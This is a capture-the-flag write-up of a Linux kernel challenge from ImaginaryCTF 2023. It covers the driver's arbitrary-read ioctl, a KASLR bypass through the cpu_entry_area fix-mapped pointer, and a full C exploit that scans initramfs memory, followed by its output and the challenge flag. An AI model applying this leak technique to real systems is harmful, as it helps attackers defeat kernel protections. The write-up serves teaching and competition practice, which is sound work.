window-of-opportunity#

window-of-opportunity (490 pts) - 11 solves by Eth007

Description: Sometimes, there is a glimmer of hope, a spark of inspiration, a window of opportunity.

Attachments https://imaginaryctf.org/r/izYM0#opportunity_dist.zip

nc window-of-opportunity.chal.imaginaryctf.org 1337

window-of-opportunity is a kernel exploitation challenge I did for the ImaginaryCTF 2023. We are given an arbitrary read primitive (and a stack buffer overflow but I didn’t use it), and the goal is basically to read the /flag.txt file. All the related files can be found there.

>...<

TLDR:

Leaking with the help of the arbitrary read primitive the kernel base address by reading a pointer toward the .text stored within the fix-mapped cpu_entry_area mapping.
Using the read primitive to read the whole kernel memory to get the flag given the initramfs is mapped in clear right after the kernel at a fixed offset.
PROFIT

Code review#

We are given a classic initramfs setup for this kernel challenge, which means we already know the whole initramfs will be mapped in memory right after the kernel at a fixed offset.

Let’s take at the ioctl provided by the kernel driver we have to pwn:

1
/* !! This is not the actual decompiled code, I rewrote it to make it easier to read */
2

3
__int64 __fastcall device_ioctl(file *filp, __int64 cmd, unsigned __int64 arg)
4
{
5
  __int64 v3; // rbp
6
  __int64 v4; // rdx
7
  __int64 v5; // rbx
8
  __int64 result; // rax
9
  request req; // [rsp+0h] [rbp-120h] BYREF
10
  unsigned __int64 v8; // [rsp+108h] [rbp-18h]
11
  __int64 v9; // [rsp+118h] [rbp-8h]
12

13
  _fentry__(filp, cmd, arg);
14
  v9 = v3;
15
  v8 = __readgsqword(0x28u);
16
  if ( (_DWORD)cmd == 0x1337 )
17
  {
18
    copy_from_user(&req, arg, 0x108LL);
19
    result = (int)copy_to_user(arg.buf, req.ptr, 0x100LL);
20
  }
21
  else
22
  {
23
    result = -1LL;
24
  }
25
  if ( v8 != __readgsqword(0x28u) )
26
    JUMPOUT(0xC3LL);
27
  return result;
28
}

The structure used to exchange with the kernel driver looks like this:

1
typedef struct request_s {
2
    uint64_t kptr;
3
    uint8_t buf[256];
4
} request_t;

Which means we have a very powerful arbitrary read primitive.

Exploitation#

To compile the exploit and pack the fs I used this quick and dirty command if you mind:

1
musl-gcc src/exploit.c -static -o initramfs/exploit && cd initramfs && find . -print0 | cpio --null -ov --format=newc > ../initramfs.cpio && cd .. && ./run.sh initramfs.cpio

First let’s take a look at the protection layout by using the kchecksec developped by @bata24 in his awesome fork of gef.

1
gef> kchecksec
2
------------------------------------------------------------------ Kernel information ------------------------------------------------------------------
3
Kernel version                          : 5.19.0
4
Kernel cmdline                          : console=ttyS0 oops=panic panic=1 kpti=1 kaslr quiet
5
Kernel base (heuristic)                 : 0xffffffff9b600000
6
Kernel base (_stext from kallsyms)      : 0xffffffff9b600000
7
------------------------------------------------------------------- Register settings -------------------------------------------------------------------
8
Write Protection (CR0 bit 16)           : Enabled
9
PAE (CR4 bit 5)                         : Enabled (NX is supported)
10
SMEP (CR4 bit 20)                       : Enabled
11
SMAP (CR4 bit 21)                       : Enabled
12
CET (CR4 bit 23)                        : Disabled
13
-------------------------------------------------------------------- Memory settings --------------------------------------------------------------------
14
CONFIG_RANDOMIZE_BASE (KASLR)           : Enabled
15
CONFIG_FG_KASLR (FGKASLR)               : Unsupported
16
CONFIG_PAGE_TABLE_ISOLATION (KPTI)      : Enabled
17
RWX kernel page                         : Not found
18
----------------------------------------------------------------------- Allocator -----------------------------------------------------------------------
19
Allocator                               : SLUB
20
CONFIG_SLAB_FREELIST_HARDENED           : Enabled (offsetof(kmem_cache, random): 0xb8)
21
-------------------------------------------------------------------- Security Module --------------------------------------------------------------------
22
SELinux                                 : Disabled (selinux_init: Found, selinux_state: Not initialized)
23
SMACK                                   : Disabled (smack_init: Found, smackfs: Not mounted)
24
AppArmor                                : Enabled (apparmor_init: Found, apparmor_initialized: 1, apparmor_enabled: 1)
25
TOMOYO                                  : Disabled (tomoyo_init: Found, tomoyo_enabled: 0)
26
Yama (ptrace_scope)                     : Enabled (yama_init: Found, kernel.yama.ptrace_scope: 1)
27
Integrity                               : Supported (integrity_iintcache_init: Found)
28
LoadPin                                 : Unsupported (loadpin_init: Not found)
29
SafeSetID                               : Supported (safesetid_security_init: Found)
30
Lockdown                                : Supported (lockdown_lsm_init: Found)
31
BPF                                     : Supported (bpf_lsm_init: Found)
32
Landlock                                : Supported (landlock_init: Found)
33
Linux Kernel Runtime Guard (LKRG)       : Disabled (Not loaded)
34
----------------------------------------------------------------- Dangerous system call -----------------------------------------------------------------
35
vm.unprivileged_userfaultfd             : Disabled (vm.unprivileged_userfaultfd: 0)
36
kernel.unprivileged_bpf_disabled        : Enabled (kernel.unprivileged_bpf_disabled: 2)
37
kernel.kexec_load_disabled              : Disabled (kernel.kexec_load_disabled: 0)
38
------------------------------------------------------------------------- Other -------------------------------------------------------------------------
39
CONFIG_KALLSYMS_ALL                     : Enabled
40
CONFIG_RANDSTRUCT                       : Disabled
41
CONFIG_STATIC_USERMODEHELPER            : Disabled (modprobe_path: RW-)
42
CONFIG_STACKPROTECTOR                   : Enabled (offsetof(task_struct, stack_canary): 0x9c8)
43
KADR (kallsyms)                         : Enabled (kernel.kptr_restrict: 2, kernel.perf_event_paranoid: 2)
44
KADR (dmesg)                            : Enabled (kernel.dmesg_restrict: 1)
45
vm.mmap_min_addr                        : 0x10000

What matters for us is mainly the KASLR that is on. Then, the first step will be to defeat it.

Defeat kASLR#

To defeat kASLR we could use the trick already use a while ago by the hxp team in one of their kernel shellcoding challenge. The idea would be to read through the cpu_entry_area fix-mapped area, that is not rebased by the kASLR, a pointer toward the kernel .text. Then giving us a powerful infoleak thats allows us to find for example the address of the initramfs. I just had to search a few minutes the right pointer in gdb and that’s it, at 0xfffffe0000002f50 is stored a pointer toward KERNEL_BASE + 0x1000b59! Which gives:

1
    req.kptr = 0xfffffe0000002f50;
2
    if (ioctl(fd, 0x1337, &req)) {
3
        return -1;
4
    }
5

6
    kernel_text =  ((uint64_t* )req.buf)[0] - 0x1000b59;
7
    printf("[!] kernel .text found at %lx\n", kernel_text);

initramfs for the win#

The initramfs is mapped right after the kernel, from kbase + 0x2c3b000, which means given we leaked the .text, we can deduce by it the address of the initramfs and then we can simply look for the icft pattern while reading the whole initramfs. Which gives:

1
    printf("[!] initramfs at %lx\n", kernel_text + 0x2c3b000);
2

3
    while (1) {
4
        req.kptr = kernel_text + 0x2c00000 + offt;
5
        if (ioctl(fd, 0x1337, &req)) {
6
            return -1;
7
        }
8

9
        for (size_t i = 0; i < 0x100; i += 4) {
10
            if (!memcmp(req.buf+i, "ictf", 4)) {
11
                printf("flag: %s\n", (char* )(req.buf+i));
12
            }
13
        }
14

15
        offt += 0x100;
16
    }

PROFIT#

Finally here we are:

1
mount: mounting host0 on /tmp/mount failed: No such device
2
cp: can't stat '/dev/sda': No such file or directory
3

4
Boot time: 2.78
5

6
---------------------------------------------------------------
7
                     _
8
                    | |
9
       __      _____| | ___ ___  _ __ ___   ___
10
       \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
11
        \ V  V /  __/ | (_| (_) | | | | | |  __/_
12
         \_/\_/ \___|_|\___\___/|_| |_| |_|\___(_)
13

14
  Take the opportunity. Look through the window. Get the flag.
15
---------------------------------------------------------------
16
/ # ./exploit
17
[!] kernel .text found at ffffffff8de00000
18
[!] initramfs at ffffffff90a3b000
19
flag: ictf{th3_real_flag_was_the_f4ke_st4ck_canaries_we_met_al0ng_the_way}

Annexes#

Final exploit:

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <inttypes.h>
4
#include <sys/types.h>
5
#include <sys/stat.h>
6
#include <fcntl.h>
7
#include <unistd.h>
8
#include <sys/ioctl.h>
9
#include <string.h>
10

11
typedef struct request_s {
12
    uint64_t kptr;
13
    uint8_t buf[256];
14
} request_t;
15

16
int main()
17
{
18
    request_t req = {0};
19
    uint64_t kernel_text = 0;
20
    uint64_t offt = 0;
21

22
    int fd = open("/dev/window", O_RDWR);
23
    if (fd < 0) {
24
        return -1;
25
    }
26

27
    req.kptr = 0xfffffe0000002f50;
28
    if (ioctl(fd, 0x1337, &req)) {
29
        return -1;
30
    }
31

32
    kernel_text =  ((uint64_t* )req.buf)[0] - 0x1000b59;
33
    printf("[!] kernel .text found at %lx\n", kernel_text);
34
    printf("[!] initramfs at %lx\n", kernel_text + 0x2c3b000);
35

36
    while (1) {
37
        req.kptr = kernel_text + 0x2c00000 + offt;
38
        if (ioctl(fd, 0x1337, &req)) {
39
            return -1;
40
        }
41

42
        for (size_t i = 0; i < 0x100; i += 4) {
43
            if (!memcmp(req.buf+i, "ictf", 4)) {
44
                printf("flag: %s\n", (char* )(req.buf+i));
45
            }
46
        }
47

48
        offt += 0x100;
49
    }
50

51
    close(fd);
52
    return 0;
53
}